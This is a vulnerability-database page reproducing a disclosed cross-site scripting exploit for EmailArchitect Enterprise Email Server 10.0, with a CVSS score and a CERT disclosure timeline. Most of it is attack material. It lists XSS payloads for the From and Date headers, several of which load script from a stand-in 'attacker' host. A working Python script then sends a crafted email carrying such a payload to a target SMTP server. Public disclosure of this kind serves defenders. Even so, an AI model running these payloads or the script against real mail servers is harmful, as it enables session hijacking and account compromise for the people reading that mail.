EmailArchitect Enterprise Email Server XSS

2014.06.21
Credit: loneferret
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

#!/usr/bin/python ''' Author: loneferret of Offensive Security Product: EmailArchitect Enterprise Email Server Version: 10.0 Vendor Site: http://www.emailarchitect.net Software Download Link: http://www.emailarchitect.net/webapp/download/easetup.exe Timeline: 29 May 2012: Vulnerability reported to CERT 30 May 2012: Response received from CERT with disclosure date set to 20 Jul 2012 23 Jul 2012: Update from CERT: No response from vendor 08 Aug 2012: Public Disclosure Installed On: Windows Server 2003 SP2 Client Test OS: Window 7 Pro SP1 (x86), OS: MAC OS Lion Browser Used: Internet Explorer 9, Firefox 12 Injection Point: From Injection Payload(s): 1: ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{} Injection Point: Date Injection Payload(s): 1: ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{} 2: <SCRIPT>alert('XSS')</SCRIPT> 3: <SCRIPT SRC=http://attacker/xss.js></SCRIPT> 4: <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> 5: <IFRAME SRC="javascript:alert('XSS');"></IFRAME> 6: </TITLE><SCRIPT>alert("XSS");</SCRIPT> 7: <SCRIPT/XSS SRC="http://attacker/xss.js"></SCRIPT> 8: <SCRIPT a=">'>" SRC="http://attacker/xss.js"></SCRIPT> ''' import smtplib, urllib2 payload = """<SCRIPT SRC=http://attacker/xss.js></SCRIPT>""" def sendMail(dstemail, frmemail, smtpsrv, username, password): msg = "From: hacker@offsec.local\n" msg += "To: victim@victim.local\n" msg += "Date: Today" + payload + "\r\n" msg += "Subject: XSS\n" msg += "Content-type: text/html\n\n" msg += "XSS.\r\n\r\n" server = smtplib.SMTP(smtpsrv) server.login(username,password) try: server.sendmail(frmemail, dstemail, msg) except Exception, e: print "[-] Failed to send email:" print "[*] " + str(e) server.quit() username = "hacker@offsec.local" password = "123456" dstemail = "victim@victim.local" frmemail = "hacker@offsec.local" smtpsrv = "172.16.84.171" print "[*] Sending Email" sendMail(dstemail, frmemail, smtpsrv, username, password)

References:

http://www.securityfocus.com/bid/54896
http://secunia.com/advisories/50203
http://packetstormsecurity.org/files/115354/EmailArchitect-Enterprise-Email-Server-10.0-Cross-Site-Scripting.html
http://osvdb.org/84520
http://www.exploit-db.com/exploits/20349
http://xforce.iss.net/xforce/xfdb/77514


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top